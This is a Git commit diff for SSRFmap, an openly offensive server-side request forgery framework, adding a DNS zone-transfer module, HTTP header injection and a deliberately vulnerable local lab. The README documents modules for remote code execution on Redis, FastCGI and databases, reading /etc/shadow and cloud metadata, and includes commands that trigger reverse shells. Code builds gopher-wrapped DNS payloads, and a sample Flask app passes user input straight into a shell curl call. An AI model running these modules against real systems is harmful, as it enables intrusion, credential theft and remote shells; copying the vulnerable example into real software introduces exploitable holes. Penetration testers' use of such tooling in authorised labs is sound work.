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SSRFmap
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Merge pull request #53 from swisskyrepo/v2 

V2 - Fixes and new module axfr
master
Swissky 2024-06-10 14:57:57 +02:00 committed by GitHub
parent 3eacb5d729 d431d336bf
commit 36eb5a3f4e
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17 changed files with 389 additions and 112 deletions
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3
.gitignore vendored
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@ -104,3 +104,6 @@ venv.bak/
# mypy
.mypy_cache/
# artifacts
127.0.0.1_5000/

23
Dockerfile
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@ -1,9 +1,20 @@
FROM python:3-alpine3.10
FROM python:3.12.4-alpine
WORKDIR /opt
WORKDIR /usr/src/app
COPY . /usr/src/app
RUN apk update && apk add git
RUN git clone https://github.com/swisskyrepo/SSRFmap.git
RUN cd /opt/SSRFmap && pip install -r requirements.txt
RUN apk update
ENTRYPOINT ["python3","/opt/SSRFmap/ssrfmap.py"]
# Install curl with outdated libcurl
RUN apk add --update build-base cmake c-ares-dev
RUN cp examples/curl-7.71.0.tar.gz /tmp
RUN tar -xvf /tmp/curl-7.71.0.tar.gz -C /tmp/
RUN cd /tmp/curl-7.71.0 && ./configure --enable-ares && make && make install
# Install requirements
RUN pip install -r requirements.txt
# Downgrade privileges
USER 1000
ENTRYPOINT ["python3"]

149
README.md
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@ -19,63 +19,72 @@ SSRF are often used to leverage actions on other services, this framework aims t
The following modules are already implemented and can be used with the `-m` argument.
| Name | Description |
| :------------- | :------------- |
| `fastcgi` | FastCGI RCE |
| `redis` | Redis RCE |
| `github` | Github Enterprise RCE < 2.8.7 |
| `zabbix` | Zabbix RCE |
| `mysql` | MySQL Command execution |
| `postgres` | Postgres Command execution |
| `docker` | Docker Infoleaks via API |
| `smtp` | SMTP send mail |
| `portscan` | Scan top 8000 ports for the host |
| `networkscan` | HTTP Ping sweep over the network |
| `readfiles` | Read files such as `/etc/passwd` |
| Name | Description |
| :------------- | :------------------------------------------------------- |
| `axfr` | DNS zone transfers (AXFR) |
| `fastcgi` | FastCGI RCE |
| `redis` | Redis RCE |
| `github` | Github Enterprise RCE < 2.8.7 |
| `zabbix` | Zabbix RCE |
| `mysql` | MySQL Command execution |
| `postgres` | Postgres Command execution |
| `docker` | Docker Infoleaks via API |
| `smtp` | SMTP send mail |
| `portscan` | Scan top 8000 ports for the host |
| `networkscan` | HTTP Ping sweep over the network |
| `readfiles` | Read files such as `/etc/passwd` |
| `alibaba` | Read files from the provider (e.g: meta-data, user-data) |
| `aws` | Read files from the provider (e.g: meta-data, user-data) |
| `gce` | Read files from the provider (e.g: meta-data, user-data) |
| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
| `socksproxy` | SOCKS4 Proxy |
| `smbhash` | Force an SMB authentication via a UNC Path |
| `tomcat` | Bruteforce attack against Tomcat Manager |
| `custom` | Send custom data to a listening service, e.g: netcat |
| `memcache` | Store data inside the memcache instance |
| `socksproxy` | SOCKS4 Proxy |
| `smbhash` | Force an SMB authentication via a UNC Path |
| `tomcat` | Bruteforce attack against Tomcat Manager |
| `custom` | Send custom data to a listening service, e.g: netcat |
| `memcache` | Store data inside the memcache instance |
## Install and Manual
Basic install from the Github repository.
* From the Github repository.
```powershell
$ git clone https://github.com/swisskyrepo/SSRFmap
$ cd SSRFmap/
$ pip3 install -r requirements.txt
$ python3 ssrfmap.py
```powershell
$ git clone https://github.com/swisskyrepo/SSRFmap
$ cd SSRFmap/
$ pip3 install -r requirements.txt
$ python3 ssrfmap.py
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
[-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
[--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
[-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
[--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell
-v [VERBOSE] Enable verbosity
--lhost LHOST LHOST reverse shell or IP to target in the network
--lport LPORT LPORT reverse shell or port to target in the network
--uagent USERAGENT User Agent to use
--ssl [SSL] Use HTTPS without verification
--proxy PROXY Use HTTP(s) proxy (ex: http://localhost:8080)
--level [LEVEL] Level of test to perform (1-5, default: 1)
```
* Docker
```powershell
$ git clone https://github.com/swisskyrepo/SSRFmap
$ docker build --no-cache -t ssrfmap .
$ docker run -it ssrfmap ssrfmap.py [OPTIONS]
$ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
```
optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell
-v [VERBOSE] Enable verbosity
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
--uagent USERAGENT User Agent to use
--ssl [SSL] Use HTTPS without verification
--proxy PROXY Use HTTP(s) proxy (ex: http://localhost:8080)
--level [LEVEL] Level of test to perform (1-5, default: 1)
```
## Examples
First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap.
They should look like the following. More examples are available in the **/data** folder.
They should look like the following. More examples are available in the **./examples** folder.
```powershell
POST /ssrf HTTP/1.1
@ -97,21 +106,27 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s
```powershell
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
```
If you want to inject inside a header, a GET or a POST parameter, you only need to specify the parameter name
```powershell
python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /tmp/test
```
If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
```powershell
# Launch a portscan against an HTTPS endpoint using a custom user-agent
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
```
Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
Some modules allow you to create a connect back, you have to specify `LHOST` and `LPORT`. Also SSRFmap can listen for the incoming reverse shell.
```powershell
# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
@ -127,11 +142,40 @@ When the target is protected by a WAF or some filters you can try a wide range o
A quick way to test the framework can be done with `data/example.py` SSRF service.
```powershell
FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles
* Local
```powershell
FLASK_APP=examples/example.py flask run &
python ssrfmap.py -r examples/request.txt -p url -m readfiles
```
* Docker
```ps1
docker build --no-cache -t ssrfmap .
# run example ssrf http service
docker run -it -v $(pwd):/usr/src/app --name example ssrfmap examples/example.py
# run example ssrf dns service
docker exec -u root:root -it example python examples/ssrf_dns.py
# run ssrfmap tool
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
```
Launch the tests requests:
```ps1
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request2.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request4.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request5.txt -p url -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /etc/issue
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m axfr
docker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m axfr --lhost 127.0.0.1 --lport 53 --ldomain example.lab
```
## Contribute
I :heart: pull requests :)
@ -189,7 +233,12 @@ You can also contribute with a beer IRL or via Github Sponsor button.
### Thanks to the contributors
- [ttffdd](https://github.com/ttffdd)
<p align="center">
<a href="https://github.com/swisskyrepo/SSRFmap/graphs/contributors">
<img src="https://contrib.rocks/image?repo=swisskyrepo/SSRFmap&max=36">
</a>
</p>
## Inspired by

75
core/requester.py
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@ -29,6 +29,9 @@ class Requester(object):
# Parse headers
for header in content[1:]:
if header == '':
# edge-case, when data is sent raw (json/xml)
break
name, _, value = header.partition(': ')
if not name or not value:
continue
@ -75,7 +78,21 @@ class Requester(object):
def do_request(self, param, value, timeout=3, stream=False):
try:
# Debug information
logging.debug(f"Request param: {param}")
logging.debug(f"Request value: {value}")
logging.debug(f"Request timeout: {timeout}")
# Handle injection in the headers
# Copying data to avoid multiple variables edit
header_injected = self.headers.copy()
if param in header_injected:
header_injected[param] = value
logging.debug("Request inject: Injecting payload in HTTP Header")
logging.debug(f"Request method: {self.method}")
if self.method == "POST":
# Copying data to avoid multiple variables edit
data_injected = self.data.copy()
@ -84,40 +101,35 @@ class Requester(object):
# Handle JSON data
if self.headers['Content-Type'] and "application/json" in self.headers['Content-Type']:
logging.debug("Request type: JSON")
logging.debug(f"Request data: {data_injected}")
r = requests.post(
self.protocol + "://" + self.host + self.action,
headers=self.headers,
json=data_injected,
data=json.dumps(data_injected),
headers=self.headers,
timeout=timeout,
stream=stream,
verify=False,
proxies=self.proxies
)
# Handle FORM data
else:
if param == '': data_injected = value
r = requests.post(
self.protocol + "://" + self.host + self.action,
headers=self.headers,
data=data_injected,
timeout=timeout,
stream=stream,
verify=False,
proxies=self.proxies
)
else:
if self.headers['Content-Type'] and "application/xml" in self.headers['Content-Type']:
# Handle XML data
elif self.headers['Content-Type'] and "application/xml" in self.headers['Content-Type']:
logging.debug("Request type: XML")
if "*FUZZ*" in data_injected['__xml__']:
logging.debug("Request inject: XML parameter")
# replace the injection point with the payload
data_xml = data_injected['__xml__']
data_xml = data_xml.replace('*FUZZ*', value)
logging.debug(f"Request data: {data_xml}")
r = requests.post(
self.protocol + "://" + self.host + self.action,
headers=self.headers,
self.protocol + "://" + self.host + self.action,
data=data_xml,
headers=self.headers,
timeout=timeout,
stream=stream,
verify=False,
@ -127,17 +139,38 @@ class Requester(object):
else:
logging.error("No injection point found ! (use -p)")
exit(1)
# Handle FORM data
else:
logging.error("No injection point found ! (use -p)")
exit(1)
if param == '':
logging.debug("Request inject: POST raw data")
data_injected = value
else:
logging.debug("Request inject: POST parameter")
r = requests.post(
self.protocol + "://" + self.host + self.action,
headers=header_injected,
data=data_injected,
timeout=timeout,
stream=stream,
verify=False,
proxies=self.proxies
)
else:
logging.error("No injection point found ! (use -p)")
exit(1)
else:
logging.debug("Request inject: GET parameter")
# String is immutable, we don't have to do a "forced" copy
regex = re.compile(param+"=([^&]+)")
value = urllib.parse.quote(value, safe='')
data_injected = re.sub(regex, param+'='+value, self.action)
r = requests.get(
self.protocol + "://" + self.host + data_injected,
headers=self.headers,
headers=header_injected,
timeout=timeout,
stream=stream,
verify=False,

BIN
examples/curl-7.71.0.tar.gz Normal file
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Binary file not shown.

24
data/example.py → examples/example.py
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@ -1,11 +1,11 @@
# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
# NOTE: this file should become a simple ssrf example in order to test SSRFmap
# NOTE: Do not try this at home - highly vulnerable ! (SSRF and RCE)
# NOTE: SSRF examples script
# FLASK_APP=example.py flask run
from flask import Flask, abort, request
import json
from flask import Flask, request
import re
import subprocess
import urllib.parse
app = Flask(__name__)
@ -40,14 +40,24 @@ def ssrf3():
@app.route("/ssrf4", methods=['POST'])
def ssrf4():
data = request.data
print(data.decode())
regex = re.compile("url>(.*?)</url")
try:
url = regex.findall(data.decode())[0]
data = urllib.parse.unquote(data)
url = regex.findall(data)[0]
print(url)
content = command(f"curl {url}")
return content
except Exception as e:
return e
print(e)
# curl -v "http://127.0.0.1:5000/ssrf5" -H 'X-Custom-Header: http://example.com'
@app.route("/ssrf5", methods=['GET'])
def ssrf5():
data = request.headers.get('X-Custom-Header')
content = command(f"curl {data}")
return content
def command(cmd):
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)

0
data/request.txt → examples/request.txt
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0
data/request2.txt → examples/request2.txt
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0
data/request3.txt → examples/request3.txt
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0
data/request4.txt → examples/request4.txt
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0
data/request5.txt → examples/request5.txt
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10
examples/request6.txt Normal file
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@ -0,0 +1,10 @@
GET /ssrf5 HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://mysimple.ssrf/
X-Custom-Header: http://example.com
Connection: close
Upgrade-Insecure-Requests: 1

50
examples/ssrf_dns.py Normal file
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@ -0,0 +1,50 @@
# NOTE example script heavily inspired from FCSC CTF 2024
# use this example to test the AXFR module
# dig @127.0.0.1 -p 53 example.lab AXFR
from dnslib.server import DNSServer, BaseResolver
from dnslib import RR, QTYPE, RCODE, A
from dns import resolver
import threading
DOMAINS = {
"frontend.example.lab.": "10.10.10.10",
"backend.example.lab.": "10.10.10.11",
"secret_flag.example.lab.": "10.10.10.12",
"test.example.lab.": "10.10.10.12"
}
class LocalDNS(BaseResolver):
def resolve(self, request, handler):
reply = request.reply()
q = request.q
print('', flush=True)
if q.qtype == QTYPE.A and str(q.qname) in DOMAINS:
reply.add_answer(RR(q.qname, QTYPE.A, rdata=A(DOMAINS[str(q.qname)])))
elif q.qtype == QTYPE.A:
default_resolver = resolver.Resolver()
try:
answers = default_resolver.resolve(str(q.qname), "A")
for answer in answers:
reply.add_answer(RR(q.qname, QTYPE.A, rdata=A(answer.address)))
except:
reply.header.rcode = RCODE.NXDOMAIN
elif q.qtype == QTYPE.AXFR and str(q.qname) == "example.lab.":
for domain, ip in DOMAINS.items():
reply.add_answer(RR(domain, QTYPE.A, rdata=A(ip)))
else:
reply.header.rcode = RCODE.NXDOMAIN
return reply
def run_server(protocol):
print(f"Server is running - {protocol}")
resolver = LocalDNS()
server = DNSServer(resolver, address="0.0.0.0", port=53, tcp=(protocol == "TCP"))
server.start()
if __name__ == "__main__":
threading.Thread(target=run_server, args=("TCP",)).start()
threading.Thread(target=run_server, args=("UDP",)).start()

91
modules/axfr.py Normal file
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@ -0,0 +1,91 @@
from core.utils import wrapper_gopher, gen_ip_list
from urllib.parse import quote
import logging
import binascii
name = "axfr"
description = "AXFR DNS"
author = "Swissky"
documentation = [
"https://vozec.fr/writeups/pong-fcsc2024-en/",
"https://mizu.re/post/pong",
"https://gist.github.com/Siss3l/32591a6d6f33f78bb300bfef241de262"
]
class exploit():
SERVER_HOST = "127.0.0.1"
SERVER_PORT = "53"
SERVER_DOMAIN = "example.lab"
def __init__(self, requester, args):
logging.info(f"Module '{name}' launched !")
# Handle args for custom DNS target
if args.lhost is not None:
self.SERVER_HOST = args.lhost
if args.lport is not None:
self.SERVER_PORT = args.lport
if args.ldomain is not None:
self.SERVER_DOMAIN = args.ldomain
# Using a generator to create the host list
gen_host = gen_ip_list(self.SERVER_HOST, args.level)
for ip in gen_host:
domain,tld = self.SERVER_DOMAIN.split('.')
# DNS AXFR - TCP packet format
dns_request = b"\x01\x03\x03\x07" # BITMAP
dns_request += b"\x00\x01" # QCOUNT
dns_request += b"\x00\x00" # ANCOUNT
dns_request += b"\x00\x00" # NSCOUNT
dns_request += b"\x00\x00" # ARCOUNT
dns_request += len(domain).to_bytes() # LEN DOMAIN
dns_request += domain.encode() # DOMAIN
dns_request += len(tld).to_bytes() # LEN TLD
dns_request += tld.encode() # TLD
dns_request += b"\x00" # DNAME EOF
dns_request += b"\x00\xFC" # QTYPE AXFR (252)
dns_request += b"\x00\x01" # QCLASS IN (1)
dns_request = len(dns_request).to_bytes(2, byteorder="big") + dns_request
payload = wrapper_gopher(quote(dns_request), ip , self.SERVER_PORT)
# Send the payload
r = requester.do_request(args.param, payload)
self.parse_output(r.text)
def parse_output(self, data):
# removing header part
lheader = len(b"\x00" + b"\x6a" + b"\x01\x03" + b"\xef\xbf\xbd" + b"\xef\xbf\xbd" + b"\x00")
lother = len(b"\x01\x00" + b"\x03" + b"\x00\x00\x00\x00")
hex_output = binascii.hexlify(data.encode())
hex_output = hex_output[(lheader+lother)*2:]
data = binascii.unhexlify(hex_output)
# extracting size
domain_size = data[0]
domain = data[1:domain_size+1]
logging.debug(f"DOMAIN: {domain_size}, {domain.decode()}")
tld_size = data[domain_size+1]
tld = data[domain_size+2:domain_size+2+tld_size]
logging.debug(f"TLD: {tld_size}, {tld.decode()}")
# subdomains
subdata = data[domain_size+2+tld_size:]
subdata_arr = subdata.decode().split("<EFBFBD>")
for sub in subdata_arr:
printable = self.bytes_to_printable_string(sub.encode())
if printable != '':
logging.info(f"\033[32mSubdomain found\033[0m : {printable}")
def bytes_to_printable_string(self, byte_string):
# Filter out non-printable characters and decode the byte string
printable_chars = (chr(byte) for byte in byte_string if chr(byte).isprintable())
# Concatenate the printable characters into a single string
printable_string = ''.join(printable_chars)
return printable_string

23
modules/readfiles.py
View File

@ -1,7 +1,6 @@
from core.utils import *
import logging
import os
from argparse import ArgumentParser
name = "readfiles"
description = "Read files from the target"
@ -12,12 +11,24 @@ class exploit():
def __init__(self, requester, args):
logging.info(f"Module '{name}' launched !")
self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
self.files = args.targetfiles.split(',') if args.targetfiles != None else [
"/etc/passwd",
"/etc/lsb-release",
"/etc/shadow",
"/etc/hosts",
"\/\/etc/passwd",
"/proc/self/environ",
"/proc/self/cmdline",
"/proc/self/cwd/index.php",
"/proc/self/cwd/application.py",
"/proc/self/cwd/main.py",
"/proc/self/exe"
]
self.file_magic = {'elf' : bytes([0x7f, 0x45, 0x4c, 0x46])}
r = requester.do_request(args.param, "")
if r != None:
if r is not None:
default = r.text
# Create directory to store files
@ -36,9 +47,9 @@ class exploit():
# Display diff between default and ssrf request
logging.info(f"\033[32mReading file\033[0m : {f}")
if bytes(diff, encoding='utf-8').startswith(self.file_magic["elf"]):
print("ELF binary found - not printing to stdout")
logging.info("ELF binary found - not printing to stdout")
else:
print(diff)
logging.info(diff)
# Write diff to a file
filename = f.replace('\\','_').replace('/','_')
@ -47,4 +58,4 @@ class exploit():
f.write(diff)
else:
print("Empty response")
logging.info("Empty response")

7
requirements.txt
View File

@ -1,2 +1,5 @@
Flask==2.3.2
requests==2.21.0
Flask==3.0.3
requests==2.31.0
dnslib==0.9.24
dnspython==2.6.1
tldextract==5.1.2

46
ssrfmap.py
View File

@ -4,33 +4,33 @@ import argparse
import logging
import urllib3
def display_banner():
print(" _____ _________________ ")
print("/ ___/ ___| ___ \ ___| ")
print("\ `--.\ `--.| |_/ / |_ _ __ ___ __ _ _ __ ")
print(" `--. \`--. \ /| _| '_ ` _ \ / _` | '_ \ ")
print("/\__/ /\__/ / |\ \| | | | | | | | (_| | |_) |")
print("\____/\____/\_| \_\_| |_| |_| |_|\__,_| .__/ ")
print(" | | ")
print(" |_| ")
print(r" _____ _________________ ")
print(r"/ ___/ ___| ___ \ ___| ")
print(r"\ `--.\ `--.| |_/ / |_ _ __ ___ __ _ _ __ ")
print(r" `--. \`--. \ /| _| '_ ` _ \ / _` | '_ \ ")
print(r"/\__/ /\__/ / |\ \| | | | | | | | (_| | |_) |")
print(r"\____/\____/\_| \_\_| |_| |_| |_|\__,_| .__/ ")
print(r" | | ")
print(r" |_| ")
def parse_args():
example_text = '''Examples:
python ssrfmap.py -r data/request2.txt -p url -m portscan
python ssrfmap.py -r data/request.txt -p url -m redis
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles
python ssrfmap.py -r examples/request2.txt -p url -m portscan
python ssrfmap.py -r examples/request.txt -p url -m redis
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles
'''
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")
parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell", nargs='?', const='1')
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
parser.add_argument('-v', action ='store_true', dest='verbose', help="Enable verbosity")
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell or IP to target in the network")
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell or port to target in the network")
parser.add_argument('--ldomain', action ='store', dest='ldomain', help="Domain to target for AXFR query or domain related modules")
parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True)
@ -58,10 +58,16 @@ if __name__ == "__main__":
]
)
logging.addLevelName( logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
logging.addLevelName( logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
logging.addLevelName(logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
logging.addLevelName(logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
display_banner()
# SSRFmap
# handle verbosity
args = parse_args()
if args.verbose is True:
logging.getLogger().setLevel(logging.DEBUG)
logging.debug("Verbose output is enabled")
# SSRFmap
ssrf = SSRF(args)